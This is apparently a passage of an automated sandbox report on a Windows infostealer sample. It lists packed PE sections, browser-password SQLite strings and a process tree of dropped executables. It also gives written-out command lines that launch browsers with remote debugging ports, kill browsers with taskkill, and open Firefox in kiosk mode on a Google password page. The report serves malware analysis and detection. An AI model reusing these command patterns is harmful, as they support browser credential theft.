                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9AE2F00_2_6C9AE2F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9A9A600_2_6C9A9A60
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C96F3800_2_6C96F380
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9D53C80_2_6C9D53C8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9AD3200_2_6C9AD320
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9653400_2_6C965340
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C97C3700_2_6C97C370
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 6C99CBE8 appears 134 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 6C9A94D0 appears 90 times
                      Source: file.exe, 00000000.00000002.2621087600.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs file.exe
                      Source: file.exe, 00000000.00000002.2614337983.0000000023C32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs file.exe
                      Source: file.exe, 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: file.exeStatic PE information: Section: riuyamyn ZLIB complexity 0.9950577701430723
                      Source: random[1].exe.0.drStatic PE information: Section: ZLIB complexity 0.9983129683242506
                      Source: random[1].exe.0.drStatic PE information: Section: hicendxx ZLIB complexity 0.9944222489784005
                      Source: DocumentsKJEGCFBGDH.exe.0.drStatic PE information: Section: ZLIB complexity 0.9983129683242506
                      Source: DocumentsKJEGCFBGDH.exe.0.drStatic PE information: Section: hicendxx ZLIB complexity 0.9944222489784005
                      Source: skotes.exe.21.drStatic PE information: Section: ZLIB complexity 0.9983129683242506
                      Source: skotes.exe.21.drStatic PE information: Section: hicendxx ZLIB complexity 0.9944222489784005
                      Source: random[1].exe.22.drStatic PE information: Section: rvygeofs ZLIB complexity 0.9946290462790364
                      Source: 824db60d2b.exe.22.drStatic PE information: Section: rvygeofs ZLIB complexity 0.9946290462790364
                      Source: random[1].exe0.22.drStatic PE information: Section: ZLIB complexity 0.9974345090759076
                      Source: random[1].exe0.22.drStatic PE information: Section: hcvjgapr ZLIB complexity 0.9946209113477865
                      Source: 8eeb449c35.exe.22.drStatic PE information: Section: ZLIB complexity 0.9974345090759076
                      Source: 8eeb449c35.exe.22.drStatic PE information: Section: hcvjgapr ZLIB complexity 0.9946209113477865
                      Source: random[2].exe.22.drStatic PE information: Section: riuyamyn ZLIB complexity 0.9950577701430723
                      Source: 241fdb96f6.exe.22.drStatic PE information: Section: riuyamyn ZLIB complexity 0.9950577701430723
                      Source: random[1].exe0.22.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                      Source: 824db60d2b.exe.22.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                      Source: random[1].exe.22.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                      Source: 8eeb449c35.exe.22.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@142/289@86/32
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9C7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,0_2_6C9C7030
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\NQW7XA29.htmJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4372:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9176:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:64:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2548:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user\AppData\Local\Temp\600bd456-8698-4ad0-a4f3-6d44da00f379.tmpJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                      Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: file.exe, 00000000.00000002.2611085779.000000001DC10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2620917443.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2619929240.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: file.exe, 00000000.00000002.2611085779.000000001DC10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2620917443.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2619929240.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: file.exe, 00000000.00000002.2611085779.000000001DC10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2620917443.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2619929240.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: file.exe, 00000000.00000002.2611085779.000000001DC10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2620917443.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2619929240.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: file.exe, 00000000.00000002.2611085779.000000001DC10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2620917443.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2619929240.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: file.exe, 00000000.00000002.2611085779.000000001DC10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2619929240.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                      Source: file.exe, 00000000.00000002.2611085779.000000001DC10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2620917443.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2619929240.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: file.exe, 00000000.00000003.2376684723.000000001DB15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2458100679.000000001DB09000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2868810554.0000000005338000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869887499.000000000531A000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3059797537.0000000005A8F000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3031315941.0000000005A94000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3062222043.0000000005A82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: file.exe, 00000000.00000002.2611085779.000000001DC10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2619929240.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: file.exe, 00000000.00000002.2611085779.000000001DC10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2619929240.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                      Source: file.exeReversingLabs: Detection: 39%
                      Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: DocumentsKJEGCFBGDH.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 --field-trial-handle=2176,i,8591507833336824045,10004583078600035240,262144 /prefetch:8
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2160,i,16259966090051703333,16306138306425127585,262144 /prefetch:3
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6904 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7068 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7560 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7560 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:8
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsKJEGCFBGDH.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\DocumentsKJEGCFBGDH.exe "C:\Users\user\DocumentsKJEGCFBGDH.exe"
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe "C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe "C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe"
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exe "C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exe"
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:3
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exe "C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe "C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exe "C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                      Source: unknownProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2300 -parentBuildID 20230927232528 -prefsHandle 2236 -prefMapHandle 2228 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b999cfbb-84d7-46b4-b70e-5bcaa2d69c0e} 5552 "\\.\pipe\gecko-crash-server-pipe.5552" 23758770b10 socket
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2624 --field-trial-handle=2536,i,9557238396092127338,18166861016205236946,262144 /prefetch:8
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exe "C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exe"
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4208 -parentBuildID 20230927232528 -prefsHandle 4232 -prefMapHandle 4228 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7cd98799-25dd-4122-971c-e59e60cd92e0} 5552 "\\.\pipe\gecko-crash-server-pipe.5552" 2376ab5bd10 rdd
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exe "C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsKJEGCFBGDH.exe"Jump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 --field-trial-handle=2176,i,8591507833336824045,10004583078600035240,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2160,i,16259966090051703333,16306138306425127585,262144 /prefetch:3Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2172,i,17403516911943754986,3464347397962498854,262144 /prefetch:3Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
